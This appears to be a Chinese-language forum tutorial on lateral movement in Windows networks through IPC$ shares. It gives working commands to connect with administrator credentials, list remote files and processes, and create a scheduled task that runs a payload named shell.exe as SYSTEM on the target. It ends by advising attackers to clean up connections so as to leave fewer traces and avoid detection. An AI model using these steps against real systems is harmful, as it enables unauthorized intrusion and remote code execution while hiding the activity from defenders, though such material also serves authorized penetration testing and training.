横向渗透利用IPC$

IPC$简介

IPC$(Internet Process Connection)是一种用于进程间通信的命名管道资源。允许通过提供可信任的用户名和口令来建立安全通道,实现对远程计算机的访问。IPC$是Windows NT/2000引入的新功能,提供了默认共享,如逻辑盘(C$, D$, E$)和系统目录(admin$)。

IPC$渗透价值

通过IPC$连接,攻击者可以与目标主机建立连接,获取目录结构、用户列表等信息。此外,攻击者可以上传文件、执行计划任务等操作,对目标主机进行深入渗透。

IPC$利用条件

  1. 139、445端口开启:IPC$连接需要139或445端口支持。
  2. 管理员开启了默认共享:攻击者可以访问默认共享,如逻辑盘和系统目录。

IPC$基本使用

1. 查看共享

在目标主机命令行输入以下命令查看开启的共享:

<code>net share</code>
图片[1]-横向渗透利用IPC$-山海云端论坛

2. 建立连接

使用以下命令在攻击主机中建立IPC$远程连接:

<code>net use \\192.168.188.140\ipc$ "1234Qwer!@#$" /user:administrator</code>
图片[2]-横向渗透利用IPC$-山海云端论坛

3. 查看连接

使用以下命令查看当前建立的连接:

<code>net use</code>
图片[3]-横向渗透利用IPC$-山海云端论坛

4. 查看目录

通过以下命令列出远程主机中的文件:

<code>dir \\192.168.188.149\c$</code>
图片[4]-横向渗透利用IPC$-山海云端论坛

5. 查看进程

使用以下命令查看远程主机上运行的进程信息:

<code>tasklist /S 192.168.188.140 /U Administrator /P 1234Qwer!@#$</code>
图片[5]-横向渗透利用IPC$-山海云端论坛

6. 计划任务

通过schtasks命令创建计划任务:

<code>schtasks /create /tn "test" /tr c:\shell.exe /s 192.168.188.140 /sc once /st 22:22 /ru system /f /u administrator /p "1234Qwer!@#$"</code>

7. 删除计划任务

删除通过schtasks创建的计划任务:

<code>schtasks /delete /s 192.168.188.140 /tn "test" /f</code>

8. 删除IPC$连接

删除建立的IPC$连接:

<code>net use '名称' /del /y</code>
图片[6]-横向渗透利用IPC$-山海云端论坛

通过以上步骤,攻击者可以在目标主机上执行多种操作,包括远程文件访问、执行计划任务等,提升渗透能力。

注意: 操作完成后建议清理IPC$连接,以减少留痕和发现的风险。

© 版权声明
THE END
喜欢就支持一下吧
点赞14 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容